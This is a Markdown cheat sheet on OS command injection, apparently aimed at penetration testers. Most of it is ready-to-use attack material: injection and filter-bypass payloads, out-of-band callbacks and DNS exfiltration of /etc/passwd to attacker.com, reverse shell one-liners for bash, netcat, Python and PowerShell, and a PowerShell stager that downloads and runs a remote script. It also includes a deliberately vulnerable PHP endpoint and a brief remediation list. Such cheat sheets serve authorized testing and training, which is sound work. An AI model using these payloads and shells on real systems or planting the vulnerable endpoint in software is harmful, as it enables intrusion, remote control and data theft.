# OS Command Injection - Methodology & Cheat Sheet

## 🎯 Quick Checklist

### 1) Identify Entry Points
- URL parameters (`?id=1&file=test`)
- POST data (forms, JSON, XML)
- Headers (`User-Agent`, `Referer`, `X-Forwarded-For`)
- Cookies
- File uploads (filename)
- API endpoints

### 2) Test Payloads (Start Simple)
```text
; whoami
& whoami
| whoami
|| whoami
whoami
$(whoami)
```

### 3) Confirm Injection
```text
; echo test
& echo test
| echo test
|| echo test
```

### 4) Determine OS
```text
; uname -a                 # Linux
; ver                      # Windows
; ping -c 1 127.0.0.1      # Linux
; ping -n 1 127.0.0.1      # Windows
```

### 5) Extract Information

| Goal | Linux | Windows |
|------|-------|---------|
| Current user | `whoami` | `whoami` |
| OS version | `uname -a` | `ver` |
| Network | `ifconfig` / `ip a` | `ipconfig` |
| Processes | `ps -ef` | `tasklist` |
| Files | `ls -la` | `dir` |
| System info | `cat /etc/passwd` | `type C:\Windows\win.ini` |

---

## 🔧 Injection Techniques by Context

### Inside Quotes
If your input is inside quotes:
```text
' ; whoami ; '
" | whoami "
```

### Inside Command Without Spaces
```text
;id
|id
||id
&id
```

### Multiple Commands
```text
whoami;id;uname -a
```

### With Absolute Path
```text
; /bin/ls -la
; C:\Windows\System32\whoami.exe
```

---

## 🌑 Blind OS Command Injection

### Detect with Time Delay

| OS | Payload |
|----|---------|
| Linux | `; ping -c 10 127.0.0.1` |
| Linux | `; sleep 10` |
| Windows | `& ping -n 10 127.0.0.1` |
| Windows | `& timeout /T 10 /NOBREAK` |

### Extract Output via Redirection
```text
; whoami > /var/www/html/output.txt
; dir > C:\inetpub\wwwroot\output.txt
```

### OAST (Out-of-Band)
```text
; nslookup attacker.com
; curl http://attacker.com
; ping -c 1 attacker.com
```

### Data Exfiltration via DNS
```text
; nslookup whoami.attacker.com
; nslookup $(cat /etc/passwd | head -1).attacker.com
```

---

## 📋 Payload Categories

### Simple Detection
```text
; echo [RANDOM]
& echo [RANDOM]
| echo [RANDOM]
|| echo [RANDOM]
```

### Command Chaining
```text
; command
& command
| command
|| command
```

### Inline Execution (Unix)
```text
`command`
$(command)
```

### Bypass with Newline
```text
%0awhoami
\nwhoami
```

### Terminate & Inject
```text
; whoami #
| whoami #
```

---

## 🚀 Reverse Shell One-Liners

### Linux
```bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
nc -e /bin/sh 10.0.0.1 4444
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```

### Windows (PowerShell)
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

Alternative (stager):
```powershell
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
```

---

## 🛠️ Bypass WAF / Filters

### URL Encoding
```text
%3Bwhoami              # ;
%26whoami              # &
%7Cwhoami              # |
%60whoami              # `
%24%28whoami%29        # $(whoami)
```

### Double URL Encoding
```text
%253Bwhoami
```

### Case Variation
```text
; WhOaMi
; wHoAmI
```

### Command Substitution
```text
$(echo whoami)
`echo whoami`
```

### Concatenation
```text
; w'h'o'a'm'i
; w"h"o"a"m"i
```

### Wildcards
```text
; /???/??whoami
; /usr/bin/w*ami
```

### Variables
```text
; whoam$()i
; wh$1oami
```

---

## 🧪 Test Environment Setup

### Create a vulnerable endpoint (PHP)

```php
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
```

Test locally:
```bash
curl "http://localhost/test.php?cmd=whoami"
```

---

## 🧰 Tools Reference

| Tool | Purpose |
|------|---------|
| Burp Suite | Manual testing, automation |
| Commix | Automated command injection testing |
| SQLMap | `--os-shell` for command execution paths |
| Netcat | Reverse shell listener |
| Custom scripts | Automation and chaining |

Commix quick start:
```bash
commix -u "http://target.com/page.php?cmd=test" --data="param=test"
```

---

## ✅ Final Checklist Before Reporting
- Confirmed injection exists
- Identified target OS
- Extracted system information
- Tested blind channel (if needed)
- Validated impact / potential RCE
- Documented reproducible steps and screenshots
- Proposed remediation
- Removed created files/shells (during authorized testing)

---

## 🛡️ Remediation (Defender View)
- Avoid shell execution APIs when possible (`system`, `exec`, `popen`, etc.).
- Use allowlists for expected input values.
- Use safe parameterized APIs (no command string concatenation).
- Run services with least privilege.
- Isolate execution context (containers, seccomp, AppArmor).
- Add monitoring for suspicious subprocess and outbound DNS/HTTP traffic.
